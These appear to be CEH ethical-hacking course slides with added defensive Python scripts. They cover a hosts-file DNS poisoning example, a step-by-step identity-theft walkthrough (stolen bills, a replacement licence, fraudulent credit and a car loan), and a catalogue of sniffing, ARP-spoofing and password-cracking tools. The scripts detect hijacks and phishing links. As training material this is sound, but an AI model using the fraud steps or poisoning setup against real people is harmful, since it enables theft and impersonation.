[Screenshot: window titled "Fake Status Bar - Microsoft Internet Explorer" showing the Comodo VerificationEngine page; annotation: "Fake status bar with padlock button".]
DNS Cache Poisoning Attack

© This attack is based on the simple convention of IP
address to host resolution.

© Here is how it works:

© Every system has a hosts file in its system
directory. In the case of Windows this file resides at
the following location:

© C:\WINDOWS\system32\drivers\etc

© This file can be used to hard code domain name
translations
Example of a normal hosts file under a
DNS poisoning attack:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
XX.XX.XX.XX     Citibank.com

In the above example XX.XX.XX.XX depicts the IP address of the hacker's
server which is hosting a fake login screen for the legitimate domain
www.citibank.com
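To detect the hard-coded redirection the example above describes, the following Python script, added here and not part of the courseware, parses a hosts file and flags any watched brand domain (or subdomain of it) that is mapped to a non-loopback address. The sample file is constructed, with 192.0.2.10 (a documentation address) standing in for the slide's XX.XX.XX.XX.

```python
"""Audit a hosts file for brand domains redirected to another address (added
example, not courseware code). SAMPLE_HOSTS is constructed input."""
import ipaddress

# Constructed sample: the slide's poisoned entry plus ordinary lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
192.0.2.10      Citibank.com www.citibank.com   # constructed: not Citibank's address
10.1.2.3        intranet.corp.example            # constructed internal host
"""


def parse_hosts(text: str) -> list:
    """Return (line number, address, hostname) for every usable mapping."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # a '#' starts a comment
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # the resolver ignores malformed lines as well
        for name in fields[1:]:
            entries.append((lineno, addr, name.lower()))
    return entries


def find_hijacks(text: str, watched_domains) -> list:
    """Mappings that send a watched domain (or a subdomain) anywhere but loopback."""
    watched = {d.lower().strip(".") for d in watched_domains}
    hits = []
    for lineno, addr, name in parse_hosts(text):
        if addr.is_loopback or addr.is_unspecified:
            continue  # 127.0.0.1, ::1 and 0.0.0.0 entries block or localize, not redirect
        if any(name == d or name.endswith("." + d) for d in watched):
            hits.append({"line": lineno, "name": name, "address": str(addr)})
    return hits


if __name__ == "__main__":
    for hit in find_hijacks(SAMPLE_HOSTS, ["citibank.com", "paypal.com"]):
        print(f"line {hit['line']}: {hit['name']} -> {hit['address']}")
```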






Identity Theft

What is "Identity Theft"?

Identity theft occurs when somebody steals
your name and other personal information for
fraudulent purposes

Identity Theft

"You'll give your credit card to a waitress with
sixteen earrings and an obscene tattoo, but you
won't give it to a reputable company with a web site?"

How do you steal
Identity?
How to steal Identity?

© Original identity - Steven Charles
© Address: San Diego CA 92130

[Image: driver license of Steven Charles, San Diego CA]

STEP 1

© Get hold of Steven's telephone bill, water bill or electricity bill
using dumpster diving, stolen mail or onsite stealing

[Images: sample telephone bills (call log report, Verizon charges, Southern Bell bill)]
STEP 2

© Go to the Driving License Authority

© Tell them you lost your driver's
license

© They will ask you for proof of identity
like a water bill, electricity bill etc.

© Show them the stolen bills

© Tell them you don't live at the
original address anymore and you
have moved house

© The department personnel will ask
you to complete 2 forms - 1 for
replacement of the driver's license and
the 2nd form for change of address

© You will need a photo for the
driver's license
STEP 3

© Your replacement driving license will be issued
to your new home address.

© Now you are ready to have some serious fun.

[Image: replacement driver license of Steven Charles]
Comparison

© Original

Same name: Steven Charles

© Identity Theft

[Images: the original driver license and the fraudulently obtained replacement side by side, both in the name of Steven Charles, San Diego CA 92130]

© Go to a bank in which the original Steven Charles has an
account (Example: Citibank)

© Tell them you would like to apply for a new credit card

© Tell them you don't remember the account number and
ask them to look you up using Steven's name and address

© The bank will ask for your ID: show them your driver's
license as ID

© ID accepted. Your credit card is issued and ready for
use

© Let's go shopping

Fake Steven has a new credit card

© Fake Steven visits Wal-Mart and purchases a 42" plasma
TV and state of the art Bose speakers

© Fake Steven buys a Vertu Gold Phone worth US 20K
Fake Steven buys car

© Fake Steven walks into a
store and applies for a car
loan and minutes later he
is driving the new Audi

© Present your driver's
license as a form of ID

© Credit check by the loan
officer comes out clean
since original Steven has
a clean credit history

[Image: "Auto Loan Approvals" advertisement: Bad Credit, No Credit, No Problem! Simple 60 Second Application; Thousands of Dealers; All makes and models available; No Obligation; Apply in Seconds, Drive Away Just as Fast]
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[Image: credit card bank statement in Steven's name listing purchases and a new balance of $40,000]
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Credit card

[Cartoon: "Ahhh!!! Somebody stole my identity!!"]



What else... oh my God!



© Fake Steven can apply for a new passport
© Fake Steven can apply for a new bank account
© Fake Steven can shut down your utility services

© FAKE STEVEN CAN MAKE THE LIFE OF REAL STEVEN HELL

© Scary, huh?
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"One bit of personal information is all someone needs to steal your identity"



Identity theft- serious problem 




© Identity theft is a serious problem today

© The number of violations has continued to increase

© Securing personal information in the workplace and at home, and looking over credit card reports, are just a few ways to minimize the risk of identity theft
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http://www.consumer.gov/idtheft/

[Screenshot: the Federal Trade Commission identity theft site (sections for Consumers, En Español, Law Enforcement, Media Resources; National Data, State Data, Reports and Testimony, Laws), reading:]

Welcome to the Federal Trade Commission - Your National Resource about Identity Theft

This website is a one-stop national resource to learn about the crime of identity theft. It provides detailed information to help you protect yourself from identity theft, and the steps to take if it occurs. It is also a comprehensive reference center - for consumers, businesses, law enforcement, and the media - with access to specific laws, contact information, and resources from federal government agencies.

One missing puzzle piece can dramatically change a puzzle's characteristics. The same is true with a person's identity - one bit of personal information is all someone needs to steal your identity. This website provides detailed information to help protect yourself, and the steps to take if identity theft occurs.

If you think your identity has been stolen, here's what to do:

1. Contact the fraud departments of any one of the three consumer reporting companies to place a fraud alert on your credit report. The
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Countermeasures 



© Be suspicious of any email with urgent requests for personal financial information

© Don't use the links in an email to get to any web page if you suspect the message might not be authentic

© Call the company on the telephone, or log onto the website directly by typing the Web address into your browser

© Avoid filling out forms in email messages that ask for personal financial information

© Always ensure that you're using a secure (HTTPS) website when submitting credit card or other sensitive information via your Web browser
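The link advice above, turned into a check you can run over a suspicious message. This is an added example and not part of the courseware: it pulls every anchor out of an HTML e-mail body and flags links that are not HTTPS, that point at a bare IP address, that lead outside the domains you trust, or whose visible text names a different host than the one the link really goes to. The e-mail body and the domain example-bank.test are constructed for the demo.

```python
"""Added example (not from the CEH courseware): a checker for the link
advice above.  Flags anchors that are not HTTPS, that use an IP-literal
host, that leave the trusted domains, or whose visible text names a host
other than the real target.  The sample e-mail and the domain
example-bank.test are constructed for the demo."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every anchor in the body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(s):
    """Hostname of a URL or bare host string, lower-cased ('' if none)."""
    if "://" not in s:
        s = "http://" + s
    return (urlsplit(s).hostname or "").lower()


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def in_trusted(host, trusted):
    return any(host == d or host.endswith("." + d) for d in trusted)


LOOKS_LIKE_URL = re.compile(r"^(https?://)?[\w.-]+\.[a-z]{2,}", re.I)


def check_links(html_body, trusted_domains):
    """Return [(href, [reasons...]), ...]; an empty reason list means the
    link passed every check."""
    c = _LinkCollector()
    c.feed(html_body)
    findings = []
    for href, text in c.links:
        host = host_of(href)
        reasons = []
        if urlsplit(href).scheme.lower() != "https":
            reasons.append("not https")
        if is_ip_literal(host):
            reasons.append("ip-literal host")
        if not in_trusted(host, trusted_domains):
            reasons.append("host not in trusted list")
        if LOOKS_LIKE_URL.match(text) and host_of(text) != host:
            reasons.append(f"text shows {host_of(text)} but link goes to {host}")
        findings.append((href, reasons))
    return findings


# Constructed phishing-style message: the first link's text looks like the
# bank, but its href is an IP address over plain HTTP.
SAMPLE_EMAIL = """
<p>Your account will be suspended. Verify now:
<a href="http://203.0.113.9/login">https://www.example-bank.test/login</a></p>
<p>Or use <a href="https://www.example-bank.test/">Online Banking</a>.</p>
"""

if __name__ == "__main__":
    for href, reasons in check_links(SAMPLE_EMAIL, ["example-bank.test"]):
        print(href, "->", "OK" if not reasons else "; ".join(reasons))
```

The text-versus-href comparison is the one that catches the classic trick in the sample: the visible text reads like the bank's HTTPS address while the anchor actually goes to an IP address over plain HTTP, which is exactly why the slide says to type the address yourself instead of clicking.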
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Ethical Hacking and 
Countermeasures 



Additional Tools

© This module is a brief study of all the CEH Additional Tools
© The tools are categorized according to their functionality



• Analyzing Tools 

• Bluetooth Tools

• Brute Force/ Password 
Cracking Tools 

• Footprinting Tools 

• Forensics Tools 

• Honeypots 

• Scanning Tools 

• Spoofing Tools 

• Wireless Tools 

• Miscellaneous Tools 
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[Diagram: the ten tool categories listed above]
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Ethical Hacking 



Analyzing Tools 



Analyzing Tool: ACID Lab

© PHP-based analysis engine

© Searches and processes a database of intrusion alerts

© The main features it provides are:

• Query-builder and search interface

• Packet viewer (decoder)

• Alert management

• Chart and statistics generation
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Analyzing Tool: AimSniff

© Simple diagnostic tool that observes and archives AOL Instant Messenger traffic across the network

© Dumps or reads PCAP files and parses them for IM messages

© Dumping can also be made to a MySQL database or to STDOUT
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Analyzing Tool: Bing

© Based on the ping command

© Bandwidth measurement tool between two points

© Measures the round trip times to the two ends of a link for packets of two different sizes and derives the link throughput from the difference
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© Converts a switched network into a shared network and promotes sniffing

© Compiles under Linux and requires libnet and libpcap

© Provides ARP spoofing, gateway router switching and many other functions
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Analyzing Tools: Darkstat, Driftnet

© Darkstat

© Network traffic analyzer

© Runs in the background and collects statistics regarding the network

© Sniffs data packets and shows them graphically

© Driftnet

© Sniffs JPEG images in the network
© Picks the images out of the traffic and displays them
© Runs on Unix and requires additional libraries
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Analyzing Tools: Ettercap-gtk, Farpd

© Ettercap-gtk

© Multipurpose GTK version of the Ettercap sniffing tool

© Sniffs or intercepts data on a switched network and performs network and host analysis

© It does active and passive analysis of many protocols

© Farpd

© Background process claiming all the idle and unassigned addresses on the network

© Responds to ARP requests by sending the IP and hardware (MAC) address of the server interface

© Basic use is for network monitoring or simulation purposes
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Analyzing Tool: Filesnarf

© Sniffs files from NFS traffic

© Saves the sniffed files in the current working directory
© Syntax:

filesnarf [-i interface] [[-v] pattern [expression]]

-i interface    Specify the interface to listen on

-v    "Versus" mode: invert the sense of matching, to select non-matching files

pattern    Regular expression for the filenames to sniff

expression    tcpdump(8) filter expression to select the traffic to sniff
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Analyzing Tool: Hammerhead

© Stress testing tool that performs load testing

© Testing is done on the specified machine by simulating load

© Supports many configurations and performs scenario-based loading

© Syntax

hammerhead [ options ] [ resultsFile ]
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Analyzing Tool: Httprint

© Fingerprinting tool that accurately identifies web servers and their attached devices

© Its main features are:

• Recognizes web servers in spite of an altered banner string and other obfuscation

• Lists devices such as printers, routers, switches, wireless access points, etc. that expose an embedded web server

• Signatures can be altered and new ones added to the database

• Follows HTTP 301 and 302 redirects

• Imports web servers from nmap network scans and its XML output files

• Reports in HTML, CSV and XML formats

• Available on Linux, Mac OS X, FreeBSD (command line only) and Win32 (command line and GUI)
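The first feature above, identifying a server when the banner has been changed, rests on the fact that different server software emits response headers in different orders. The following added example (not httprint's own code or signature database) shows the idea: it parses a raw HTTP response, reduces it to the sequence of header names, and scores that sequence against known orderings with a longest-common-subsequence match. The two signatures and the sample response are constructed for the demo; httprint's real signatures and real servers differ in detail.

```python
"""Added example (not httprint's code or signature database): fingerprint a
web server by the ORDER of its response headers instead of its Server:
banner.  Signatures and the sample response are constructed for the demo."""

# Illustrative header orderings (assumed for the example, not authoritative).
SIGNATURES = {
    "Apache-like": ["Date", "Server", "Last-Modified", "ETag",
                    "Accept-Ranges", "Content-Length", "Content-Type"],
    "IIS-like": ["Content-Length", "Content-Type", "Last-Modified",
                 "Accept-Ranges", "ETag", "Server", "Date"],
}


def parse_response(raw):
    """Split a raw HTTP response into (status line, ordered header list)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def lcs_len(a, b):
    """Length of the longest common subsequence (order-preserving match)."""
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b):
            cur.append(prev[j] + 1 if x == y else max(prev[j + 1], cur[j]))
        prev = cur
    return prev[-1]


def order_score(observed, signature):
    """1.0 means the observed order is exactly the signature's order."""
    sig = [h.lower() for h in signature]
    return lcs_len(observed, sig) / max(len(observed), len(sig), 1)


def fingerprint(raw, signatures=SIGNATURES):
    status, headers = parse_response(raw)
    observed = [name.lower() for name, _ in headers]
    banner = next((v for n, v in headers if n.lower() == "server"), "")
    scores = {name: order_score(observed, sig) for name, sig in signatures.items()}
    best = max(scores, key=scores.get)
    return {"status": status, "banner": banner, "best_match": best, "scores": scores}


# Constructed response: the banner claims Apache, but the header order is the
# IIS-like one, so the order-based guess disagrees with the banner.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 13\r\n"
    b"Content-Type: text/html\r\n"
    b"Last-Modified: Mon, 01 Jan 2001 00:00:00 GMT\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"ETag: \"abc\"\r\n"
    b"Server: Apache/2.0.52\r\n"
    b"Date: Mon, 01 Jan 2001 00:00:01 GMT\r\n"
    b"\r\n"
    b"<html></html>"
)

if __name__ == "__main__":
    r = fingerprint(SAMPLE_RESPONSE)
    print("banner:", r["banner"], "| order-based guess:", r["best_match"], r["scores"])
```

A real signature set would also use details such as the exact status-line text and how unusual requests are answered, but header order alone is enough to show why a rewritten banner does not fool this kind of tool.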
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Analyzing Tool: Icmpinfo

© Sniffs ICMP messages received on the live host
© Detects various threats and network problems
© Syntax:

icmpinfo [-v[v[v]]] [-n] [-p] [-s] [-l]

© Output is shown as follows:

MMM DD HH:MM:SS ICMP_type[sub-type] <sender_ip [sender_name] >unreach_ip [unreach_name] sp=source_port dp=dest_port seq=sequence sz=packet_size
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Analyzing Tool: IDSwakeup

© Bourne shell script and collection of tools
© Tests network intrusion detection systems
© Has two components:

• IDSwakeup, which launches hping2 or iwu. It gives the option to select the attack to be done

Syntax:

./IDSwakeup <src addr> <dst addr> [nb] [ttl]

• iwu, which sends a buffer as a datagram and alters the source address, the destination address and the TTL (to have a short TTL); nb is the number of times to send the same datagram. It requires libnet 1.x.

Syntax:

./iwu <srcIP> <dstIP> <nb> <ttl> <ip-datagram>

Copyright © by EC-Council
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Analyzing Tool: Iftop

© Listens to network traffic and shows the current bandwidth used by the host system

© Requires the libpcap and libcurses files

© Filter code can suppress the display of, for example, DNS traffic so that heavy traffic on the network can be avoided

© Syntax:

iftop -h | [-nNpbBP] [-i interface] [-f filter code] [-F net/mask]
Analyzing Tool: Ippl

© Daemon process that logs information about IP packets coming into and going out of the host computer

© Logs incoming TCP connections, UDP datagrams and ICMP packets sent to a host

© Its major limitation is that it is not easily configurable

© Syntax:

ippl [-hn] [-c file-name] [--help] [--nodaemon] [--config file-name]
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© Analyzer or sniffer that works on the Ethernet protocol

© Main features include:

• Supports X Windows with Gtk output

• Displays one connection or the whole traffic on the network station

• Automatically identifies network stations

• Includes a protocol description language to add other protocols

• Displays real-time statistics on the network or on a particular station

• Allows to-disk captures of most frame type/protocol combinations

• Allows to-disk captures of unidentifiable packets
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Analyzing Tool: Nast

© Packet interceptor/logger and LAN analyzer based on libnet and libpcap
© Logs the packets found on the network interface
© Works in both normal and promiscuous mode
© Sniffed data can be saved in a separate file
© Main features include:

• Builds a LAN hosts list and follows a TCP-DATA stream
• Finds LAN internet gateways
• Resets an established connection
• Performs single half-open and multi half-open port scanning
• Finds the link type (hub or switch)
• Catches daemon banners of LAN nodes
• Controls ARP answers to discover possible ARP spoofing
• Byte counting with an optional filter
• Writes report logs
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Analyzing Tool: Ngrep

© Applicable at the network layer

© Offers some of the features of GNU grep

© Permits regular or hexadecimal expressions to match against the data payloads of packets

© Identifies TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands BPF filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop

© Syntax:

ngrep <-hXViwqpevxlDtT> <-IO pcap_dump> <-n num> <-d dev> <-A num> <-s snaplen> <match expression> <bpf filter>
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Analyzing Tool: Netsed

© Handy and simple tool

© Changes the contents of packets passing through the network

© Used in the following applications:

• Black-box protocol auditing

• Fuzz-like experiments, integrity tests

• Other common applications like fooling other people, content filtering, etc.
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Analyzing Tool: Nstreams

© Determines the IP streams that are occurring on a network from a non-user-friendly tcpdump output of several megabytes

© Nstreams can read the tcpdump output directly from stdin, or from a file

© Syntax:

nstreams [ -v ] [ -c nstreams-services ] [ -n nstreams-networks_file ] [ -N [ -i ] [ -I ] ] [ -r ] [ -O output [ -D iface ] [ -Y ] ] [ -u ] [ -U ] [ -B ] [ -f tcpdump_file ] [ -l <iface> ] [ tcpdump output ]
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Analyzing Tool: Packit

© Network auditing tool that serves as a packet analysis and injection tool

© Capability to customize, inject, monitor, and manipulate IP traffic

© Defines (spoofs) all TCP, UDP, ICMP, IP, ARP, RARP and Ethernet header options

© Used in testing firewalls, intrusion detection systems, port scanning, simulating network traffic and general TCP/IP auditing
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© Network protocol analyzer for SSLv3/TLS

© Recognizes TCP connections on the network interface and treats them as SSLv3/TLS traffic

© Decodes the records and shows them in textual form on stdout

© Can decrypt the connections (given the server's RSA private key) and display the application data traffic
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Analyzing Tool: Tcpflow

© Protocol analyzer / debugging tool that captures the data carried on TCP connections

© Unlike tcpdump, which shows only a summary of the packets, it stores the actual data transmitted

© Reassembles the data by sequence number and saves each flow in a separate file

© Based on the LBL Packet Capture Library and supports rich filtering expressions

© Syntax

tcpflow [-chpsv] [-b max_bytes] [-d debug_level] [-f max_fds] [-i iface] [-r file] [expression]
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Analyzing Tool: Tcpick

© Program that captures the TCP data stream of TCP connections and stores each in a separate file

© Prints the data on the console in different formats

© Syntax

tcpick [ -a ] [ -n ] [ -C ] [ -e count ] [ -i interface | -r file ] [ -X timeout ] [ -D ] [ -F1 | -F2 ] [ -yH | -yP | -yR | -yU | -yx | -yX ] [ -bH | -bP | -bR | -bU | -bx | -bX ] [ -wH[ub] | -wP[ub] | -wR[ub] | -wU[ub] ] [ -v [ verbosity ] ] [ -S ] [ -h ] [ --separator ] [ -T | -Tf [ number ] ] [ -E | -Ef [ number ] ] [ -Pc | -Ps ] [ "filter" ] [ --help ] [ --version ]
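What tcpflow and tcpick both do underneath is reassemble each direction of a connection from its segments by sequence number. The following added example (not the code of either tool) does that for a handful of constructed segments: it groups them into flows named the way tcpflow names its output files, puts them back in order, collapses a retransmitted segment, and counts the bytes of any hole. Sequence-number wrap-around is not handled, and the segment list is made up for the demo; nothing is captured from a real interface.

```python
"""Added example (not tcpflow's or tcpick's own code): reassemble TCP
payload per direction from individual segments using their sequence
numbers.  Segments are constructed; there is no capture.  Sequence number
wrap-around is not handled."""
from collections import defaultdict


def flow_name(src, sport, dst, dport):
    """tcpflow output file name: zero-padded octets and ports, e.g.
    010.000.000.005.40000-010.000.000.001.00080"""
    def fmt(ip, port):
        return ".".join(f"{int(o):03d}" for o in ip.split(".")) + f".{port:05d}"
    return f"{fmt(src, sport)}-{fmt(dst, dport)}"


def reassemble(segments):
    """segments: iterable of (src, sport, dst, dport, seq, payload bytes).
    Returns {flow_name: (stream bytes, number of missing bytes)}.  Later
    copies of a byte overwrite earlier ones (retransmissions collapse);
    bytes never seen are left as NUL and counted as missing."""
    flows = defaultdict(list)
    for src, sport, dst, dport, seq, data in segments:
        if data:
            flows[flow_name(src, sport, dst, dport)].append((seq, data))
    streams = {}
    for name, segs in flows.items():
        segs.sort(key=lambda s: s[0])
        base = segs[0][0]
        buf, seen = bytearray(), bytearray()
        for seq, data in segs:
            off, end = seq - base, seq - base + len(data)
            if end > len(buf):
                buf.extend(bytes(end - len(buf)))
                seen.extend(bytes(end - len(seen)))
            buf[off:end] = data
            seen[off:end] = b"\x01" * len(data)
        streams[name] = (bytes(buf), seen.count(0))
    return streams


def _segments(src, sport, dst, dport, seq0, parts):
    """Helper: cut consecutive payloads at increasing sequence numbers."""
    out, seq = [], seq0
    for p in parts:
        out.append((src, sport, dst, dport, seq, p))
        seq += len(p)
    return out


# Constructed traffic: a request whose segments arrive out of order and one
# of which is retransmitted, plus a response with a 3-byte hole.
REQ = _segments("10.0.0.5", 40000, "10.0.0.1", 80, 1000,
                [b"GET /index.html HTTP/1.0\r\n", b"Host: example.test\r\n", b"\r\n"])
RESP = _segments("10.0.0.1", 80, "10.0.0.5", 40000, 5000,
                 [b"HTTP/1.0 200 OK\r\n", b"XYZ", b"<html></html>"])
SAMPLE = [REQ[2], REQ[0], REQ[1], REQ[0], RESP[0], RESP[2]]   # RESP[1] never seen


def demo():
    return reassemble(SAMPLE)


if __name__ == "__main__":
    for name, (data, missing) in demo().items():
        print(name, len(data), "bytes,", missing, "missing")
        print(data.decode("latin-1"))
```

Writing each value of the returned dictionary to a file named by its key gives the same layout tcpflow produces on disk; the hole count is what you would want reported before trusting a reconstructed stream.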
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Analyzing Tool: Tcpslice

© Utility that extracts portions of packet traces from tcpdump files

© Also pastes together several such files

© Uses libpcap to read the files

© Basic operation is to copy the packets whose timestamps fall within a given range to stdout (or to the file given with -w)

© Syntax:

tcpslice [ -dRrt ] [ -w file ] [ start-time [ end-time ] ] file ...
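The file format tcpslice cuts and pastes (and that tethereal, below, writes) is small enough to handle by hand. The following added example, which is not tcpslice's own code, is a minimal reader and writer for the libpcap file format plus a function that does what tcpslice does with a start and end time: concatenate several capture files and keep only the records whose timestamps fall inside the window. The capture files are built in memory with placeholder payloads; nothing is read from a real interface.

```python
"""Added example (not tcpslice's or tethereal's own code): read and write
the libpcap file format and slice captures by timestamp.  The capture
files below are constructed with placeholder payloads."""
import struct

PCAP_MAGIC = 0xA1B2C3D4          # microsecond-resolution pcap
LINKTYPE_ETHERNET = 1


def write_pcap(packets, linktype=LINKTYPE_ETHERNET):
    """packets: list of (ts_sec, ts_usec, bytes).  Returns file contents."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype)
    for ts_sec, ts_usec, data in packets:
        out += struct.pack("<IIII", ts_sec, ts_usec, len(data), len(data)) + data
    return out


def read_pcap(blob):
    """Returns (linktype, [(ts_sec, ts_usec, bytes), ...]); handles both
    byte orders and refuses truncated records instead of guessing."""
    if len(blob) < 24:
        raise ValueError("too short for a pcap header")
    (magic,) = struct.unpack("<I", blob[:4])
    if magic == PCAP_MAGIC:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a pcap file (bad magic)")
    linktype = struct.unpack(end + "IHHiIII", blob[:24])[6]
    packets, off = [], 24
    while off < len(blob):
        if off + 16 > len(blob):
            raise ValueError("truncated packet header")
        ts_sec, ts_usec, incl, _orig = struct.unpack(end + "IIII", blob[off:off + 16])
        off += 16
        data = blob[off:off + incl]
        if len(data) != incl:
            raise ValueError("truncated packet data")
        packets.append((ts_sec, ts_usec, data))
        off += incl
    return linktype, packets


def tcpslice(blobs, start, end):
    """Concatenate the given capture files and keep records with
    start <= timestamp <= end (seconds, as floats)."""
    linktype, kept = None, []
    for blob in blobs:
        lt, packets = read_pcap(blob)
        if linktype is None:
            linktype = lt
        elif lt != linktype:
            raise ValueError("cannot paste captures with different link types")
        kept.extend(p for p in packets if start <= p[0] + p[1] / 1e6 <= end)
    return write_pcap(kept, linktype if linktype is not None else LINKTYPE_ETHERNET)


# Constructed captures (payloads are placeholders, not real frames).
FILE_A = write_pcap([(1000, 0, b"A1"), (1005, 500000, b"A2"), (1010, 0, b"A3")])
FILE_B = write_pcap([(1015, 0, b"B1"), (1020, 0, b"B2")])


def demo():
    """Timestamps (seconds) left after slicing A+B to the window 1004..1016."""
    _, packets = read_pcap(tcpslice([FILE_A, FILE_B], 1004, 1016))
    return [p[0] + p[1] / 1e6 for p in packets]


if __name__ == "__main__":
    print(demo())
```

The reader deliberately raises on a short last record rather than silently dropping it: a capture that was cut off mid-packet is worth knowing about before it goes into evidence.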
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Analyzing Tool: Tcpspy

© Provides details regarding incoming and outgoing TCP/IP connections

© Commonly used by administrators

© Provides the username, local address and port, remote address and port, and, optionally, the executable filename

© Doesn't require libpcap
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Analyzing Tool: Tcptrace

© Used as a bridge between client and server

© Requires the local port number, destination server, and destination port number

© Provides information on each connection like elapsed time, bytes and segments sent and received, retransmissions, round trip times, window advertisements, throughput, etc.

© Also produces a number of graphs for further analysis

© Works with all the text-based IP protocols
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Analyzing Tool: Tethereal

© Analyzing tool that captures packets from the network or from a stored file, analyzes them and saves them to a file or displays them on the console
© Writes capture files in the libpcap file format
© Reads from files in various file formats
© Syntax:

tethereal [ -a capture autostop condition ] ... [ -b capture ring buffer option ] ... [ -c capture packet count ] [ -d <layer type>==<selector>,<decode-as protocol> ] [ -D ] [ -f capture filter ] [ -F file format ] [ -h ] [ -i capture interface ] [ -l ] [ -L ] [ -n ] [ -N name resolving flags ] [ -o preference setting ] ... [ -p ] [ -q ] [ -r infile ] [ -R read (display) filter ] [ -s capture snaplen ] [ -S ] [ -t time stamp format ] [ -T pdml | psml | ps | text ] [ -v ] [ -V ] [ -w savefile ] [ -x ] [ -y capture link type ] [ -z statistics ]
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Analyzing Tool: Urlsnarf

© Displays all the URLs sniffed from HTTP traffic in the Common Log Format

© Output can be used directly by log analyzers

© Part of the dsniff toolkit

© Syntax:

urlsnarf [-n] [-i interface] [[-v] pattern [expression]]
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Ethical Hacking

Bluetooth Tools

Bluetooth Tool: Btscanner

[Screenshot: btscanner device list, "Devices found: 7", with columns for base address, clock offset, class and name (e.g. Nokia 6310i, Nokia 7650)]

© Extracts information from Bluetooth devices

© Based on the BlueZ Bluetooth stack

© Extracts HCI and SDP information

© Maintains an open connection to monitor

© Contains a list of IEEE OUI numbers and class lookup tables
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Bluetooth Tools: Bluez-pin, Obexftp

© Bluez-pin

• User interface for a Bluetooth device

• Enters the PIN code

© Obexftp

• OBject EXchange File Transfer Protocol client

• Built on OpenOBEX; supports IrDA, Bluetooth and serial transports

• Easy access to mobile phones
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Bluetooth Tool

© Script wrapper

© Places an X window around the basic minicom package

© A software solution to configure a router

[Screenshot: minicom command summary screen (Minicom 1.60, "Written by Miquel van Smoorenburg 1991-1994"), listing the Ctrl-A key functions such as dialing directory, send/receive files, COM parameters, terminal emulation, run script, hangup, initialize modem, run Kermit, local echo on/off, clear screen, configure minicom, and quit]
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Ethical Hacking

Brute Force/Password Cracking Tools

Brute Force Tool: KOld

© Knocking On LDAP's Door

© Dictionary attack against LDAP servers

© Tries to find the password

© Prevents 'cannot assign requested address' errors



I 



© Bfbtester 

• bfbtester is Brute 
Force Binary Tester 

• Checl<s the bi nary 
programs 

• All overflows in a 
software cannot be 
tested 

• Tested on FreeBSD, 
Linux and Solaris 

• Alerts the user against 
usi ng unsafe tempf i I e 



© Smb-nat 

• NetBIOS auditing tool 

• Performs security 
check on NetBIOS file 
servi ces 

• Enumerates the 
shares 

• Makes a break- in 
attempt 
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Brute Force Tool: Vncrack

© Similar to crack, for VNC
© Decrypts VNC passwords stored under the fixed key
© Replaces older versions
© Cooperates with PHoss
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Ethical Hacking

Footprinting Tools

Footprinting Tool: Argus-client

© An IP network transaction auditing tool
© Works on Linux and Unix platforms
© Reads network datagrams

© Can trace network problems

© Argus-server is the matching server for argus-client.
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Footprinting Tool: Argus-server

© IP network transaction auditing tool

© Works on Linux/Unix platforms.

© Reads network datagrams

© Can trace network problems

© Argus-client is the matching client for argus-server.
Footprinting Tool: Arpd

© User-space Address Resolution Protocol (ARP) daemon

© Manages the ARP table

© Useful for sites with large network segments.
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Footprinting Tool: Arpfetch

© Fetches the address pairings between Ethernet and IP.

© Gathers the information for arpsnmp
© Two command arguments are used:

• Host argument

• Cname (the SNMP community name)
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Footprinting Tool: Arping

© Sends ARP/ICMP requests to the specified host
© Shows the host's response
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Footprinting Tool: Arpwatch

© Monitors the network traffic and keeps track of Ethernet/IP address pairings.
© Sends an alert if any change happens in the network.
© It creates the arp.dat file to maintain the record
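Arping, Arpwatch, Farpd, Nast's "control ARP answers" feature and the untitled ARP spoofing tool in the Analyzing Tools section all work on the same 28-byte packet. The following added example, which is not the code of any of those tools, builds an ARP request the way arping does, parses ARP frames, and keeps an arpwatch-style table of Ethernet/IP pairings that records a "changed ethernet address" event when a known IP suddenly answers from a different MAC, which is what an ARP spoofing attack looks like on the wire. All frames are constructed in memory; none are sent, and the addresses are made up for the demo.

```python
"""Added example (not the code of any tool named on this page): build and
parse Ethernet/ARP frames and keep an arpwatch-style pairing table that
flags a MAC change for a known IP.  Frames and addresses are constructed
for the demo; nothing touches a real network."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
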